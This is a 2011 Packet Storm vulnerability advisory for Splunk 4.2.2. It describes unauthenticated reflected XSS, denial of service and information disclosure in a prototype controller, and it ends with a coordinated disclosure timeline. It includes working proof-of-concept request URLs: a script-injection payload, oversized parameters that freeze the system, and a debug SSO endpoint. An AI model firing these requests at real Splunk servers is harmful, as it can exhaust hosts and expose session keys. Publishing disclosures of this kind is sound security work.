Splunk Cross Site Scripting / Denial Of Service

2011-10-19T00:00:00
ID PACKETSTORM:105989
Type packetstorm
Reporter Filip Palian
Modified 2011-10-19T00:00:00

Description

                                        
                                            `-- Product description:  
Splunk collects, indexes and harnesses the massive volumes of valuable  
machine data generated by your complex IT infrastructure, whether  
physical, virtual or in the cloud.  
  
-- Vulnerable product:  
The vulnerability was found and tested on splunk-4.2.2-101277-linux-2.6-x86_64.  
  
-- Problem Description:  
The script "splunk/lib/python2.6/site-packages/splunk/appserver/mrsparkle/controllers/prototype.py"  
is prone to lack of user input validation resulting in reflected XSS  
(yes, I have them enough too) and denial of service (operating system  
freez). Below some details are included.  
  
-- Requirements:  
No authentication in Splunk was required to successfuly conduct the attacks.  
  
-- Proof Of Concept:  
Reflected XSS:  
https://localhost/en-US/prototype/segmentation_performance?lines=2&depth=2&segment=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&element=aaa&attribute=aaa&segmentation=flattened  
  
DoS:  
https://localhost/en-US/prototype/segmentation_performance?lines=999&depth=99999999&segment=foo&element=span&attribute=class&segmentation=nested  
  
little bonus - Information disclosure:  
https://localhost/en-US/prototype/segmentation_performance?lines=99999999999999999999999999999999999999&depth=99999999999999999999999999999999999999&segment=foo&element=span&attribute=class&segmentation=nested  
https://localhost/en-US/debug/sso  
  
-- Impact:  
Possible disclosure of the valid Splunk session key, full system  
resources exhaustion resulting, sensitive information disclosure.  
  
-- Disclosure timeline:  
2011.08.25: detailed information about vulnerability and PoC sent to vendor  
2011.08.25: vendor response  
2011.10.19: vendor released official fixes  
2011.10.19: advisory released  
  
-- Greetz  
as always... goes to folks from #dragonfly  
  
  
Best regards,  
Filip Palian  
`